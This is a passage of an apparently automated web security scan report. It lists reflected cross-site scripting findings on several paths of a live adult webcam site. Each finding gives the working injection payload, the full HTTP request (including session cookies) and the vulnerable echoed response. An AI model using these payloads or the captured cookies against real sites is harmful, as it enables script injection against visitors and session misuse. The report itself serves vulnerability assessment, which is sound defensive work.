HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:28 GMT Connection: close Content-Length: 25736 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/snapshotgallery.aspx&he=imlive.com&ul=/live-sex-chats/sex-show-photos/?71e01'-alert(1)-'ba036a24c83=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ...[SNIP]...
4.541. http://imlive.com/live-sex-chats/sex-show-photos/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://imlive.com
Path:
/live-sex-chats/sex-show-photos/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36a69"><a>8ff796eb34d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /live-sex-chats/sex-show-photos/?36a69"><a>8ff796eb34d=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:18 GMT Connection: close Content-Length: 25588 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/live-sex-chats/sex-show-photos/?36a69"><a>8ff796eb34d=1');return false;" lang="en-US" hreflang="en-US"> ...[SNIP]...
4.542. http://imlive.com/live-sex-chats/sex-show-sessions/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://imlive.com
Path:
/live-sex-chats/sex-show-sessions/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 45e02'-alert(1)-'fb52648c8dd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/sex-show-sessions/?45e02'-alert(1)-'fb52648c8dd=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:37 GMT Connection: close Content-Length: 26074 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/recordedlivesessions.aspx&he=imlive.com&ul=/live-sex-chats/sex-show-sessions/?45e02'-alert(1)-'fb52648c8dd=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ...[SNIP]...
4.543. http://imlive.com/live-sex-chats/sex-show-sessions/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://imlive.com
Path:
/live-sex-chats/sex-show-sessions/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1dabb"><a>3c523209842 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /live-sex-chats/sex-show-sessions/?1dabb"><a>3c523209842=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:07 GMT Connection: close Content-Length: 25926 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/live-sex-chats/sex-show-sessions/?1dabb"><a>3c523209842=1');return false;" lang="en-US" hreflang="en-US"> ...[SNIP]...
4.544. http://imlive.com/live-sex-chats/sex-video-features/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://imlive.com
Path:
/live-sex-chats/sex-video-features/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2028a"><a>c334382ea0e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /live-sex-chats/sex-video-features/?2028a"><a>c334382ea0e=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:29 GMT Connection: close Content-Length: 32222 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/live-sex-chats/sex-video-features/?2028a"><a>c334382ea0e=1');return false;" lang="en-US" hreflang="en-US"> ...[SNIP]...
4.545. http://imlive.com/live-sex-chats/sex-video-features/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://imlive.com
Path:
/live-sex-chats/sex-video-features/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 80442'-alert(1)-'ebd4ed614b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/sex-video-features/?80442'-alert(1)-'ebd4ed614b9=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:37 GMT Connection: close Content-Length: 32369 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hotfeatures.aspx&he=imlive.com&ul=/live-sex-chats/sex-video-features/?80442'-alert(1)-'ebd4ed614b9=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ...[SNIP]...
4.546. http://imlive.com/live-sex-chats/shemale-couple/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://imlive.com
Path:
/live-sex-chats/shemale-couple/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52e5c"><a>069e897b555 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /live-sex-chats/shemale-couple/?52e5c"><a>069e897b555=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:23:34 GMT Connection: close Content-Length: 92559 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <a href="/live-sex-chats/shemale-couple/?52e5c"><a>069e897b555=1"> ...[SNIP]...
4.547. http://imlive.com/live-sex-chats/shemale-couple/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://imlive.com
Path:
/live-sex-chats/shemale-couple/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9f758'-alert(1)-'be71a5fa912 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/shemale-couple/?9f758'-alert(1)-'be71a5fa912=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:06 GMT Connection: close Content-Length: 92716 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/shemale-couple/?9f758'-alert(1)-'be71a5fa912=1&qs=cat=1^roomid=557^9f758'-alert(1)-'be71a5fa912=1&qs=cat=1^roomid=557^9f758'-alert(1)-'be71a5fa912=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63 ...[SNIP]...
4.548. http://imlive.com/live-sex-chats/shemale/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://imlive.com
Path:
/live-sex-chats/shemale/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b7464'-alert(1)-'af09ad182b3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/shemale/?b7464'-alert(1)-'af09ad182b3=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:23:31 GMT Connection: close Content-Length: 224765 Vary: Accept-Encoding
